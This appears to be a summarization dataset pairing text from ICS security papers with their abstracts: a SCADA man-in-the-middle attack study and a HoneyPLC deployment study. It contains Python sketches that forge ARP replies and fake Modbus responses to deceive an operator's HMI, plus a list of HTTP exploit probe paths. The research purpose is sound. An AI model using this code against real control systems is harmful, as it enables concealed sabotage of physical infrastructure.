As part of an attack, a Modbus request with a wrong unitID, blindly used by an attacker, may be discarded or easily flagged with proper security mechanisms. Thus, for Modbus over TCP, it is critical to perform a Modbus enumeration on top of the traditional TCP/IP scans. Both types of scans are relevant, as they can be used not only to discover devices and types of services but also to perform fingerprinting and discover PLCs behind gateways. Figure 7: Modbus Device Scan / Enumeration. Network scouting provides a perspective on the target infrastructure from the network point of view, corresponding to layers 2-4 of the OSI model. Despite its usefulness as a tool to identify and enumerate devices and services, it doesn't provide process-level information, which is required to implement sophisticated attacks. The next subsection will present the technique that was used to obtain such information. C. Using ARP poisoning to implement a MitM attack The concept of an ARP poisoning MitM attack usually comprises two parts: an ARP spoofing step and a communication hijacking step. In the first stage, the idea is to spoof the ARP cache of both target devices, belonging to the same link, by sending malicious and unsolicited ARP is-at messages to the network (see Figure 8), to force both devices to send their packets through the attacker's MAC address. This requires the attacker to know at least the IP and MAC addresses of the victims and the link they are connected to. As soon as the ARP cache of each victim is spoofed, the traffic gets redirected through the attacker. Figure 8: ARP poisoning attack. In the second attack stage (see Figure 9), when the traffic is already being redirected, the attacker can choose to read the messages and forward them, or actively change them.
Depending on the type of TCP connection, its payload and the actual data the attacker is interested in, the process may get complex. For persistent TCP connections, as opposed to one TCP connection per data request (Modbus can be implemented using either communication model), the attacker will need to keep the TCP fields consistent (e.g. sequence and acknowledgement numbers) and the connection open (e.g. TCP keep-alive packets). Figure 9: TCP hijacking. Moreover, in the case of Modbus, the requested values typically change in real-time and some of them are directly changed by the SCADA operator (e.g. Modbus writes). This means the attacker needs to somehow keep track not only of all the interactions but also compute and reproduce the effects on the physical process (e.g. closing a circuit breaker in an electric path may change physical values such as current and voltage in other parts of the circuit). The complexity of this increases as the number of elements, relations and interdependencies increases. D. Attack strategy and execution The objective of the attacker can be summarized as such: hijack the entire grid in such a way that the main HMI (HMI1) has no clue about the ongoing attack. Moreover, the attack goal should be accomplished by the attacker while going unnoticed.
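Keeping the TCP fields consistent on a hijacked persistent connection, as described above, essentially reduces to tracking the byte difference the attacker introduces in each direction and shifting later sequence and acknowledgement numbers accordingly. A rough sketch of that bookkeeping (an assumption about one reasonable way to do it, not the paper's implementation):

```python
class SeqTracker:
    """Track seq/ack adjustments for one direction of a hijacked TCP flow.

    Whenever the attacker forwards a payload whose length differs from the
    original, the difference must be added to the sequence numbers of later
    packets in that direction (and subtracted from the peer's acks), so that
    neither endpoint sees a gap and drops the connection.
    """
    def __init__(self):
        self.delta = 0

    def on_forward(self, original_len: int, forged_len: int) -> None:
        self.delta += forged_len - original_len

    def fix_seq(self, seq: int) -> int:
        return (seq + self.delta) % 2**32          # seq numbers wrap at 2^32

    def fix_ack(self, ack: int) -> int:
        return (ack - self.delta) % 2**32

t = SeqTracker()
t.on_forward(original_len=12, forged_len=15)       # forged reply 3 bytes longer
print(t.fix_seq(1000), t.fix_ack(2003))  # 1003 2000
```

One such tracker per direction, plus periodic keep-alives, is what keeps a persistent Modbus session alive while its payloads are being rewritten.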
One of the first challenges faced by the attacker has to do with understanding the network topology and communication flows. For instance, the HMI1 host (one of the victims) is not part of the same network link as the PLCs, requiring the attacker to implement an ARP spoof targeting the gateway interface of the network link where the attacker is placed, instead of the HMI1 (see Figure 10). Figure 10: ARP poisoning for the implemented attack. Besides HMI1, there is a second HMI (HMI2), developed to observe and validate the attack, which was not spoofed. HMI1 uses persistent TCP connections to control several PLCs (11, to be more precise). Thus, the attacker needs to know how to handle or forward any spoofed packets in real-time, while avoiding TCP connection drops, to prevent any suspicious behaviour on the HMI console that could unveil his presence (see Figure 11). Packet drops automatically raise an alarm and change the view of the HMI for the corresponding PLC after a couple of seconds, indicating a potential issue. A lost TCP connection or a lack of a Modbus reply from the PLC is also visible from the HMI console. The second HMI did not use persistent connections. Later, during the trials, it was discovered that each PLC only supported a maximum of two simultaneous TCP connections. This may limit the way TCP connections are handled and redirected by the attacker. Figure 11: TCP hijacking for the implemented attack. At first, the main concern was to place the attacker in the middle of the communication between the HMI1 and the PLCs, to capture and analyze relevant process information. This allowed the attacker to gather more detailed information about the communications and the controlled process, learning how each Modbus register value affected the others (e.g. circuit breakers, current and voltage ranges). Once the attacker was able to figure out the basic behavior of the controlled process, it was time to step up the challenge and hijack the entire process.
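The ARP poisoning step described above comes down to sending forged, unsolicited "is-at" replies. The frame construction can be sketched with the standard library alone (actually transmitting it would need a raw socket and is omitted; all MAC and IP addresses below are hypothetical examples):

```python
import struct

def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))

def ip_bytes(ip: str) -> bytes:
    return bytes(int(octet) for octet in ip.split("."))

def forged_arp_reply(attacker_mac: str, spoofed_ip: str,
                     victim_mac: str, victim_ip: str) -> bytes:
    """Build an unsolicited ARP 'is-at' reply claiming that spoofed_ip
    lives at attacker_mac, addressed directly to the victim."""
    eth = mac_bytes(victim_mac) + mac_bytes(attacker_mac) + struct.pack(">H", 0x0806)
    arp = struct.pack(">HHBBH", 1, 0x0800, 6, 4, 2)        # Ethernet/IPv4, opcode 2 = reply
    arp += mac_bytes(attacker_mac) + ip_bytes(spoofed_ip)  # sender: attacker MAC, spoofed IP
    arp += mac_bytes(victim_mac) + ip_bytes(victim_ip)     # target: the victim (e.g. the HMI)
    return eth + arp

# Hypothetical addresses: poison the victim's cache so the PLC's IP maps
# to the attacker's MAC.
frame = forged_arp_reply("aa:bb:cc:dd:ee:ff", "10.0.0.20",
                         "11:22:33:44:55:66", "10.0.0.10")
print(len(frame))  # 14-byte Ethernet header + 28-byte ARP payload = 42
```

Sending the mirror-image frame to the gateway interface, as the paper describes, completes the two-sided poisoning, and restoring the caches at the end is the same frame with the correct MAC/IP associations.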
This required forging the entire grid state in such a way that any HMI interaction would produce a realistic state update, while decoupling HMI-PLC interactions. For this purpose, the attacker needs to reply to the Modbus requests in real-time. Moreover, TCP session hijacking requires the attacker to maintain the integrity of the TCP connection (such as TCP sequence numbers) to avoid a connection drop. The following task is then crafting the Modbus frames and recreating a fake view of the entire scenario in real-time. This task was implemented using an in-house application on top of the Scapy framework [22], since common open-source tools normally used for this sort of attack are not SCADA/Modbus aware and did not fulfill the project needs, either by not offering an integrated solution for all the steps or by lacking the flexibility to adjust settings to the HEDVa scenario. After the ARP spoofing, the attacker first starts by capturing the current state of the grid. This is achieved by dumping and decoding one complete interaction cycle (i.e. the set of Modbus request-reply transactions) between the HMI1 and all PLCs. This represents the initial state of the simulated view, and it allows restoring the previous grid state after stopping the attack (in case the attacker wants to do so). The attacker is also responsible for performing deep inspection of each packet and selectively intercepting all the TCP connections from the HMI1 to the PLCs while forwarding the others (i.e. the communications between HMIs and PLCs). When requests from the HMI1 are received, the attacker will compute the responses based on its own replica of the model (obtained during the process analysis stage).
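The decoupling step described above can be sketched as a function that answers HMI read requests from the attacker's own state replica rather than the real PLC. This is an illustrative sketch only (the register map and values are hypothetical, and the paper's actual tool was built on Scapy, handling many more cases):

```python
import struct

# Attacker's replica of the process state, captured during one complete
# HMI-PLC polling cycle (register addresses and values are hypothetical,
# e.g. two voltage readings and a breaker flag).
fake_state = {0: 230, 1: 231, 2: 1}

def forge_read_response(request: bytes, state: dict) -> bytes:
    """Answer a 'read holding registers' (function code 3) request from the
    replica, echoing the transaction ID so the HMI accepts the reply."""
    tid, proto, length, unit = struct.unpack(">HHHB", request[:7])
    fc, start, count = struct.unpack(">BHH", request[7:12])
    assert fc == 3, "this sketch only handles function code 3"
    values = b"".join(struct.pack(">H", state.get(start + i, 0))
                      for i in range(count))
    pdu = struct.pack(">BB", fc, len(values)) + values
    return struct.pack(">HHHB", tid, proto, len(pdu) + 1, unit) + pdu

# HMI asks unit 1 for 2 registers starting at address 0 (transaction 7).
request = struct.pack(">HHHB", 7, 0, 6, 1) + struct.pack(">BHH", 3, 0, 2)
reply = forge_read_response(request, fake_state)
print(reply.hex())  # 00070000000701030400e600e7
```

Once every HMI1 request is answered this way, the HMI sees a consistent but fabricated grid, while the attacker talks to the real PLCs over a separate flow.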
This effectively decouples the HMI1 from the PLCs, creating two distinct communication flows: one between the HMI1 and the attacker, and the other between the attacker and each PLC. This allows not only hijacking the data exchanged between them but also triggering any kind of service disruption against the PLCs, compromising the physical process behind them. Since the true state of the PLCs is hidden from HMI1, the attacker is free to do whatever he wants without the knowledge of the legitimate SCADA operator. Moreover, all the changes performed by the SCADA operator, such as opening or closing a breaker, are properly intercepted and handled by the attacker. Finally, whenever the attacker decides to stop the attack, he only needs to perform the inverse of the first steps: dumping the values of the simulated HMI1 view to the PLCs, so that there is no difference between the HMI1 and PLC states, and restoring the ARP caches by sending additional unsolicited ARP replies with the correct associations between MAC and IP addresses. V. CONCLUSIONS AND FUTURE WORK The attack procedures described here illustrate a complete intrusion procedure applied to a specific IACS use case. The reconnaissance step is similar to other types of network scans; the main difference is the Modbus unitID field, depending on the components and how they are deployed. The service disruption is also straightforward since, as soon as the attacker has access to the network, it is simple to redirect Modbus traffic (causing the disruption) or even flood the PLCs, as they typically have a moderate/small amount of resources available. The communication hijacking attack that was implemented has proven to be considerably more complex and tightly coupled to the field processes in the SCADA environment than, for instance, an HTTP hijacking attempt. This is due to several reasons, such as the need to reproduce part of the physical process behavior without getting detected.
Despite new infection paths, types of attacks or strategies to go unnoticed, further efforts and research should focus on improving the process of recreating and maintaining the fake views used by the attacker during the communication hijacking, for specific known domains like energy grids. This work is part of a wider effort where multiple cyber detection technologies are being researched to understand how these types of cyber-security events could be adequately handled. Moreover, this effort also intends to alleviate the lack of openly available datasets (such as raw traces from SCADA IACS), allowing to further explore and research new security approaches and detection mechanisms. ACKNOWLEDGMENT This work was partially funded by the CockpitCI European Project (FP7-SEC-2011-1 Project 285647) and by the ATENA European Project (H2020-DS-2015-1 Project 700581). REFERENCES [1] ISA, ISA-62443-1-1 Security for industrial automation and control systems, Part 1: Terminology, concepts, and models, draft 5, International Society for Automation, 2015. [2] NIST SP 800-82, Guide to Industrial Control Systems (ICS) Security, Rev. 2, National Institute of Standards and Technology, 2015. [3] ISA-99.00.01, Security for Industrial Automation and Control Systems - Part 1: Terminology, Concepts, and Models, American National Standard, 2007. [4] FP7 CockpitCI Research Project, https://www.cockpitci.eu/ [5] H2020 ATENA Research Project, https://www.atena-h2020.eu/ [6] T. Cruz, L. Rosa, J. Proenca, L. Maglaras, M. Aubigny, L. Lev, J. Jiang, P. Simoes, A cyber security detection framework for supervisory control and data acquisition systems, IEEE Transactions on Industrial Informatics, Preprint. doi:10.1109/TII.2016.2599841 [7] T. Cruz, J. Proenca, P. Simoes, M. Aubigny, M. Ouedraogo, A. Graziano, L. Maglaras, A Distributed IDS for Industrial Control Systems, International Journal of Cyber Warfare and Terrorism, 4(2), 1-22, April-June 2014. DOI: 10.4018/ijcwt.2014040101 [8] C.
Queiroz, A. Mahmood, J. Hu, Z. Tari, and X. Yu, Building a SCADA security testbed, in Network and System Security (NSS '09), Third International Conference on, pp. 357-364, IEEE, 2009. [9] M. Mallouhi, Y. Al-Nashif, D. Cox, T. Chadaga, and S. Hariri, A testbed for analyzing security of SCADA control systems (TASSCS), in Innovative Smart Grid Technologies, 2011 IEEE PES, pp. 1-7, 2011. [10] S. Bhatia, N. Kush, C. Djamaludin, J. Akande, and E. Foo, Practical Modbus flooding attack and detection, in Proceedings of the 12th Australasian Information Security Conference, Volume 149, pp. 57-65, Australian Computer Society, Inc., 2014. [11] B. Chen, N. Pattanaik, A. Goulart, K. L. Butler-Purry, and D. Kundur, Implementing attacks for Modbus/TCP protocol in a real-time cyber physical system test bed, in Comm. Quality and Reliability, 2015 IEEE International Workshop Technical Committee on, pp. 1-6, 2015. [12] E. E. Miciolino, G. Bernieri, F. Pascucci, and R. Setola, Communications network analysis in a SCADA system testbed under cyber-attacks, in Telecommunications Forum (TELFOR), 23rd, pp. 341-344, 2015. [13] D. Chen, Y. Peng, and H. Wang, Development of a testbed for process control system cybersecurity research, in 3rd International Conference on Electric and Electronics, Atlantis Press, 2013. [14] R. Langner, To kill a centrifuge: a technical analysis of what Stuxnet's creators tried to achieve, The Langner Group, November 2013. [15] Laboratory of Cryptography and System Security (CrySyS), Duqu: A Stuxnet-like malware found in the wild, http://www.crysys.hu/publications/files/bencsathPBF11duqu.pdf [16] BlackEnergy & Quedagh: the convergence of crimeware and APT attacks, https://www.fsecure.com/documents/996508/1030745/blackenergy_whitepaper.pdf [17] Modbus Organization, Modbus protocol specification. [18] Modbus Organization, Modbus messaging on TCP/IP implementation guide. [19] IMS Research, The World Market for Industrial Ethernet, 2013 Edition.
[20] Nmap scripting engine, modbus-discover NSE script, https://nmap.org/nsedoc/scripts/modbus-discover.html [21] Mark Bristow, Modscan, https://code.google.com/archive/p/modscan/ [22] A. Gervais, Modbus/TCP library for Scapy 0.1.
Summary:
As Supervisory Control and Data Acquisition (SCADA) and Industrial and Automation Control System (IACS) architectures became more open and interconnected, some of their remotely controlled processes also became more exposed to cyber threats. Aspects such as the use of mature technologies and legacy equipment, or even the unforeseen consequences of bridging IACS with external networks, have contributed to this situation. This situation prompted the involvement of governmental, industrial and research organizations, as well as standardization entities, in order to create and promote a series of recommendations and standards for IACS cyber-security. Despite those efforts, which are mostly focused on prevention and mitigation, existing literature still lacks attack descriptions that can be reused to reproduce and further research specific use cases and scenarios of security incidents, useful for improving and developing new security detection strategies. In this paper, we describe the implementation of a set of attacks targeting a SCADA hybrid testbed that reproduces an electrical grid for energy distribution (medium and high voltage). This environment makes use of real SCADA equipment to faithfully reproduce a real operational deployment, providing a better insight into less evident SCADA- and device-specificities.
|
Summarize:
Index Terms: Industrial Control Systems, Critical National Infrastructure, Programmable Logic Controllers, Supervisory Control & Data Acquisition, Industrial Honeypot

I. INTRODUCTION

Operational Technology (OT), or Industrial Control Systems (ICS), was considered secure for decades because it was isolated by an air gap. This air gap is the space between the control systems and the organisation managing those systems, which has been guarded by fences and locked doors [5]. However, the gap has been closed by the increased convergence between IT and OT, which exposes ICS to more significant risk [1]. A look at one of the most advanced ICS attacks, the Stuxnet worm, reveals that one of the vulnerabilities leveraged by the worm had received a public patch two years before the Stuxnet attack. That vulnerability was first discovered after being exploited by another well-known worm, the Conficker worm, revealing the challenges of timely patching. The recent war in Ukraine and the subsequent cyber attacks on critical infrastructure show that attacks targeting ICS tend to advance alongside combat [16]. IT security controls come in different forms, with Defence-in-Depth considered best practice [2]. This strategy recommends a layered approach to slow the attacker down while buying time for defenders to detect and respond to the attack. One of the defence layers that can improve security is the honeypot [4]. Honeypots are systems designed to be breached. Their single purpose is to be compromised, making every attempt to connect to them suspicious [3]. This paper addresses the efficiency of honeypot deployment and specifically investigates the following aims: to summarise the limitations of existing ICS honeypot deployments, and to evaluate, through experimental investigation, the impact of deploying an ICS honeypot in the cloud versus on-premise.
The structure of this study is as follows: the discussion of related work in Section II is followed by Section III, which outlines the architecture design for the experimental work. The results and discussion are given in Section IV, followed by the conclusion in Section V.

II. RELATED WORK

Available literature in the field of ICS honeypots focuses on different deployment infrastructures. These include, among others, public cloud deployments of ICS honeypots [8], [9] and on-premise deployments exposed to the internet [17]. However, to the best of our knowledge, work in the ICS honeypot field has focused more on improving the functionality and complexity of the honeypots and less on the deception impact of the deployment location. The following section presents current work on ICS honeypot development, focusing on the deployment location the surveyed studies have implemented. Public cloud deployments are those using public cloud providers to minimise maintenance costs. This advantage makes cloud deployment a desirable method for most researchers despite the deployment's discrepancy from ICS-native infrastructure. López-Morales et al. [8] improved a Honeyd-based honeypot to achieve a medium-interaction honeypot. The improvement is achieved by implementing an interactive web interface and S7Comm, web and SNMP services. The implementation is deployed in the cloud, where four attacks are recorded. A hybrid ICS honeypot implementation is deployed in a hosting company by You et al. [9]. The cloud deployment is connected with an on-site deployment with physical PLCs, hence the hybrid nature of the honeynet.

2023 IEEE 19th International Conference on Factory Communication Systems (WFCS) | 978-1-6654-6432-1/23/$31.00 ©2023 IEEE | DOI: 10.1109/WFCS57264.2023.10144119
The cloud front end handles a list of predefined ICS protocol requests while the back-end PLCs handle the rest, bringing novelty to ICS honeypot development. However, this deployment fails to acknowledge that recognising a PLC honeypot by observing the cloud infrastructure is trivial. Lastly, Rashid et al. [18] propose a multi-platform honeypot, which includes a Conpot-based ICS honeypot. Their experiment, deployed in the public cloud, collects a limited amount of interactions on the PLC interface, which yields unconvincing results. The related work surveyed here focused on advancing the functionality and sophistication of ICS honeypots. However, few acknowledge the role of the deployment location in the honeypot's deception capability. Honeypot sophistication efforts bring little value without a consistently deceptive deployment location, and vice versa. To the best of our knowledge, none of the present research measures the effect that cloud deployment might have on the deception capability of ICS honeypots.

TABLE I
LITERATURE REVIEW OF EXISTING WORK IN ICS HONEYPOT DEVELOPMENT

Year | Title | Attacks | Deployment
2020 | HoneyPLC: A next-generation honeypot for industrial control systems [8] | Four | Public cloud
2021 | HoneyVP: A cost-effective hybrid honeypot architecture for industrial control systems [9] | None | Public cloud
2022 | Faking smart industry: exploring cyber-threat landscape deploying cloud-based honeypot [18] | None | Public cloud
2023 | This paper | One | On-premise

In this study, we propose a novel implementation of HoneyPLC which, unlike the study by López-Morales et al. [8], deploys HoneyPLC on a hardware device on-premise. Our improvement differs from the implementations proposed by You et al. [9] and Rashid et al. [18], which are deployed in the cloud. Thus, it evaluates the deployment method's role in the amount of valuable attack data attracted.
Finally, this paper proposes a honeypot installation approach on a physical machine, where a more recently developed honeypot, HoneyPLC, is used.

III. EXPERIMENT ARCHITECTURE

A covert ICS honeypot deployment shall start with an ICS-consistent deployment, as suggested by Rowe et al. [6]. A poorly chosen deployment may turn away a potential attacker before they interact with the ICS honeypot. An attacker interacting with the honeypot shall have an experience similar to a real-world ICS device [6]. The detail of the honeypot interfaces is key to deceiving the attacker or public scanners (e.g. Shodan.io). Reconnaissance tools like Shodan use a HoneyScore evaluation algorithm to assess whether an internet-exposed system is a disguised honeypot. Shodan uses a proprietary algorithm to calculate a number from 0.0 to 1.0 to distinguish honeypots (score close to 1.0) from genuine systems (score close to 0.0) [6]. Shodan-identified honeypots often carry Shodan-attached tags like cloud or hosting together with honeypot. The honeypot selected for this experiment is HoneyPLC, which provides medium interaction, more deceptive than low interaction, and allows cost-efficient deployment on a physical machine without the unnecessary complexity of a high-interaction honeypot. The experiment's setup, presented in Figure 1, comprises a physical machine running Ubuntu 18.04 LTS and the HoneyPLC server in a residential building in Aarhus, Denmark. A managed switch replicates the HoneyPLC traffic and mirrors it to the logging machine. A router with a residential internet line forwards the ports of the HTTP and S7Comm services, listening on a static IP and TCP ports 80 and 102.

Fig. 1. Private infrastructure deployment.

An identical infrastructure is deployed at a public cloud provider in Frankfurt, Germany.
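Shodan's HoneyScore algorithm is proprietary, so the tag co-occurrence noted above can only be caricatured. The toy check below (function name and tag list are our own, not Shodan's) merely mirrors the observation that hosting-related tags appearing together with a honeypot tag give a deployment away:

```python
# Illustrative only: Shodan's HoneyScore algorithm is proprietary. This
# toy check mirrors the observation that hosting-related tags
# co-occurring with a honeypot tag are a giveaway.
def looks_like_flagged_honeypot(tags):
    hosting = {"cloud", "hosting"}
    return "honeypot" in tags and bool(hosting & set(tags))

print(looks_like_flagged_honeypot({"cloud", "honeypot"}))  # True
print(looks_like_flagged_honeypot({"ics", "plc"}))         # False
```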
This setup creates the basis for an experimental evaluation to validate the efficacy of the different deployment methods. The main difference in the cloud setup is the implementation of a gateway server, a port-filtering device. A dedicated machine performs the collection to maintain data integrity. This machine logs all packets from the HoneyPLC. As depicted in Figure 1, a switch is used between the HoneyPLC and the gateway to replicate the HoneyPLC traffic. The logging machine uses Wireshark, a packet capture tool that sniffs packets transmitted or received on a network interface [10]. Once irrelevant packets are filtered, a Packet Capture (PCAP) file with internet-initiated connections is produced. At this point, the PCAP file is a collection of relevant and irrelevant traffic. A method inspired by Ferretti et al. [7] is adapted to this project's needs and used to filter and analyse the traffic. The method includes:
1) Inputting raw traffic into Wireshark to filter and analyse only relevant information.
2) Identifying scanners: remove duplicate IP addresses and correlate IP addresses with owner names using Wireshark's integrated name resolution (DNS PTR records).
3) Manually observing and extracting a list of scanner IP addresses.
4) Using the generated list to filter out all packets associated with scanners and crawlers.
5) Observing the remaining traffic for attack patterns, filtering on the ICS protocol S7Comm.
Data from the on-premise deployment gains meaning only when juxtaposed with the data collected from the cloud deployment. Therefore, a cloud HoneyPLC deployment is implemented for reference. Cloud deployment data collection and analysis are logically identical to the on-premise deployment.
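The scanner-identification steps (2-4) above can be sketched in a few lines. The keyword list and record shapes below are illustrative assumptions, not the paper's actual tooling, which relies on Wireshark:

```python
# Sketch of steps 2-4 above: dedupe source IPs, mark those whose resolved
# PTR name looks like a known scanner, then drop their packets. The
# keyword list and record shapes are illustrative assumptions.
SCANNER_KEYWORDS = ("shadowserver", "censys", "shodan", "binaryedge")

def build_scanner_list(resolved):
    """Steps 2-3: collect unique IPs whose PTR name matches a scanner."""
    scanners = set()
    for src_ip, ptr_name in resolved:
        if ptr_name and any(k in ptr_name.lower() for k in SCANNER_KEYWORDS):
            scanners.add(src_ip)
    return scanners

def filter_packets(packets, scanners):
    """Step 4: drop every packet whose source IP is a known scanner."""
    return [p for p in packets if p["src"] not in scanners]

resolved = [
    ("203.0.113.5", "scan-01.shadowserver.org"),
    ("198.51.100.7", None),                       # no PTR record
    ("203.0.113.5", "scan-01.shadowserver.org"),  # duplicate IP
]
packets = [{"src": "203.0.113.5"}, {"src": "198.51.100.7"}]
scanners = build_scanner_list(resolved)
remaining = filter_packets(packets, scanners)
print(sorted(scanners), remaining)
```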
IV. RESULTS AND DISCUSSION

The experiment conducted consisted of two identical HoneyPLC deployments: one in the cloud and the second on-premise. Both deployments collected data for 65 days, from November 2022 until January 2023, and both followed the instructions provided by the HoneyPLC creators [8]. The results collected are grouped based on common characteristics. The first step is to enumerate the public scanners interacting with the deployments. Public scanners will often not accumulate targeted attacks but will enumerate online devices by sending requests or probes and analysing the responses. Some internet scanners might specifically look for ICS devices in order to inform agencies. Wireshark's built-in name resolution capability was used to distinguish the internet scanners. This feature resolves IP addresses to domain names, which can later be correlated to organisations. Figure 2 depicts how many unique IP addresses communicated with the cloud and on-premise deployments, how many of those addresses are associated with well-known scanners, and the counts for the top scanner organisation, Shadowserver.

Fig. 2. Well-known scanner IP addresses:

Deployment | Unique IP addresses | Total scanner IP addresses | shadowserver.org
Cloud      | 4,568 | 797 | 326
On-premise | 3,421 | 807 | 338

Geolocating the origin of traffic is sometimes helpful in tracking trends. Wireshark's MaxMind database integration is used to map IP addresses to a country of origin [11]. When comparing the interest in both deployments, a shift can be observed: the second most web-service-interacting country for the cloud deployment is the UK, whereas for the on-premise deployment it is Germany. For the ICS-interacting measures, the second-place source country changes to China, while the USA consistently remains the country interacting the most with both deployments, regardless of the listening service.
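The per-country ranking behind these observations is a simple counter over resolved origins. A minimal sketch follows, with invented sample data standing in for the MaxMind lookup the paper uses:

```python
from collections import Counter

# Sketch of the per-country tally described above. The IP-to-country map
# is invented sample data; the paper uses Wireshark's MaxMind database
# integration for the real lookup.
def top_countries(source_ips, geo, n=2):
    """Count interactions per origin country and return the top n."""
    return Counter(geo.get(ip, "unknown") for ip in source_ips).most_common(n)

geo = {"198.51.100.1": "US", "203.0.113.2": "DE", "192.0.2.3": "US"}
hits = ["198.51.100.1", "203.0.113.2", "192.0.2.3", "198.51.100.1"]
print(top_countries(hits, geo))  # [('US', 3), ('DE', 1)]
```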
The difference in ICS interactions is observed in the third most common source country, which for the cloud is the UK and for on-premise is Portugal. An IP address originating from a specific country does not mean that the interaction originated there, as devices in foreign countries can be compromised and later used as proxies to hide the origin. Each deployment exposed two services: HTTP and S7Comm. HTTP is a common service traditionally deployed both in the cloud and on-premise, whereas S7Comm is the service associated with ICS devices, which is the honey of this honeypot. Table II depicts the number of unique IP addresses interacting with both services and which of those did not belong to scanners. The ICS-related traffic is filtered by protocol: S7Comm. Table II also depicts the number of exploit attempts and the number of scanner and non-scanner IP addresses interacting with the S7Comm protocol. Even though the number of S7Comm interactions was significantly smaller than the number of HTTP interactions, the recorded activity is more relevant to the ICS device. This activity is directly linked with ICS interest, which means it can be used to measure ICS deception effectiveness. The on-premise deployment attracts multiple attacks originating from a single IP address, indicating the deception advantage of the deployment. Attacks in this study are requests for PLC memory Read and PLC Stop and Start commands. The PLC Stop and Start commands are considered attacks as they can potentially impact the availability of the PLC, an attack type called a Denial of Service attack. PLC memory Read requests are activity seen in the reconnaissance phase of an attack.

TABLE II
HTTP AND S7COMM INTERACTIONS WITH CLOUD AND ON-PREMISE DEPLOYMENT

Deployment | HTTP unique IP addr. | HTTP non-scanner IP addr. | HTTP unique exploit interactions | S7Comm unique IP addr. | S7Comm non-scanner IP addr. | PLC interactions (attacks)
On-premise | 1,488 | 1,199 | 501 | 154 | 53 | 116 (28)
Cloud      | 2,054 | 1,790 | 1,810 | 144 | 70 | 80 (0)

Table II shows that the HTTP service attracts more attention on the cloud deployment. The number of unique IP addresses, and even non-scanner addresses, interacting with the cloud deployment is almost double, and the number of unique HTTP exploit interactions is triple. However, the deeper analysis in the following part shows that those HTTP interactions are irrelevant to the ICS device. When observing the interactions with the S7Comm service, an interaction shift is observed from the cloud towards on-premise. The on-premise deployment attracts more unique IP addresses than the cloud deployment, which send PLC memory Read or PLC Stop and Start requests, which are also considered malicious. Two compelling types of interactions were observed in the results. First, the HTTP exploit interactions: these came from devices that attempted to exploit known vulnerabilities in publicly exposed systems.

TABLE III
RECORDED HTTP EXPLOIT ATTEMPTS AGAINST CLOUD AND ON-PREMISE DEPLOYMENT

Malicious URL | Exploit description | Reference
/boaform/admin/formLogin | Fiber optic router exploit | [12]
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | PHP exploit - remote code execution | [13]
/Autodiscover/Autodiscover.xml | Exploit of Outlook Web App with autodiscover enabled | [14]
/GponForm/diag_Form?images/ | Vulnerability in GPON home routers | [15]

Table III lists the HTTP exploits attempted against both the cloud and the on-premise deployments. None of the observed exploit attempts succeeded, as they target different types of destination systems.
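The Table III probes can be matched mechanically. In the sketch below, the path prefixes come from the table, while the matcher itself (function name, labels) is our own illustration:

```python
# Minimal sketch: flag HTTP request paths matching the exploit probes in
# Table III. The path prefixes mirror the table; the function name and
# labels are our own illustration.
EXPLOIT_PREFIXES = {
    "/boaform/admin/formLogin": "fiber optic router exploit",
    "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php": "PHP remote code execution",
    "/Autodiscover/Autodiscover.xml": "OWA autodiscover probe",
    "/GponForm/diag_Form": "GPON home router exploit",
}

def classify_request(path):
    """Return the exploit label for a request path, or None if unmatched."""
    for prefix, label in EXPLOIT_PREFIXES.items():
        if path.startswith(prefix):
            return label
    return None

print(classify_request("/GponForm/diag_Form?images/"))  # GPON home router exploit
print(classify_request("/index.html"))                  # None
```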
It is hard to say why the cloud deployment was exposed to more exploit attempts. One possible explanation is that web applications like Citrix, WordPress, Apache and Outlook are often deployed in the cloud, making adversaries look for them there. Other irrelevant exploit attempts were recorded. For example, it is unclear why an exploit for a fiber optic router or a GPON router, as shown in Table III, was attempted against the cloud deployment; GPON routers are typically residential devices. One possible explanation is that the exploit traffic was generated by worms looking for vulnerable devices. Even though these interactions provide some intelligence into which vulnerabilities are exploited in the wild, they are of little value for ICS/OT-specific threat intelligence. Analysis of the HTTP service interactions shows that the attacks yield IT-relevant results which are not ICS related. The S7Comm protocol offers specifically ICS-related results. Only 10% of the unique IP addresses interacted with S7Comm, as shown in Table II. On closer inspection, this traffic consists of reconnaissance activities that read the PLC memory blocks. These readings can be used to understand the logic currently running on the PLC, and such information can further help adversaries develop an exploit. The observed interactions with the ICS protocol provide valuable intelligence for the parties that studied the ICS deployments. Furthermore, a PLC Stop and Start attempt shows that the on-premise deployment deceives an adversary. No payload deployment has been observed (Ladder Logic capture), and no ICS-targeted HTTP exploitation has been observed.

V. CONCLUSION

This study has proposed a deployment shift of ICS honeypots from the cloud to on-premise, arguing that on-premise and physical deployments collect more relevant data than their cloud counterparts. The sign of an inefficient ICS honeypot deployment is data that is not actionable.
The experiment evaluates the deployment effects of ICS honeypots by running a 65-day internet exposure and data collection. It compares a medium-interaction honeypot, HoneyPLC, deployed in two different environments: cloud and on-site. The paper demonstrates that ICS honeypots will inevitably attract mainly unrelated web-application-specific or scanner traffic; based on the observed results, such honeypots will often collect irrelevant data. However, the on-premise deployment attracts multiple attacks. This finding informs the future development of the current work in progress to validate the deployment impact on deception capability. This validation shall be achieved by adding a third experimental deployment, a physical PLC, to serve as a control group for the expected interactions. Based on these conclusions, practitioners shall consider ICS honeypot deployment on-premise as it mimics the expected infrastructure of ICS systems.

ACKNOWLEDGMENT

This research is supported by the School of Computing, Engineering & the Built Environment at Edinburgh Napier University.
Summary:
The Industrial Control System (ICS) industry faces an ever-growing number of cyber threats, and the defence against them can be strengthened using honeypots. Like the systems they mimic, ICS honeypots should be deployed in a context similar to fielded ICS systems. This ICS context demands a novel honeypot deployment process that is more consistent with real ICS systems. State-of-the-art ICS honeypots mainly focus on deployments in cloud environments, which could divulge their true intent to cautious adversaries. This experimental research project addresses this limitation by evaluating the deception capability of a public cloud and an on-premise deployment. Results from a 65-day HoneyPLC experiment show that the on-premise deployment attracts more Denial of Service and reconnaissance ICS attacks. The results guide future researchers that an on-premise deployment might be more convincing and attract more ICS-relevant interactions.
|
Summarize:
Index Terms: Industrial Control Systems, False Data Injection Attack, I/O Database, PROFINET I/O Systems

I. INTRODUCTION

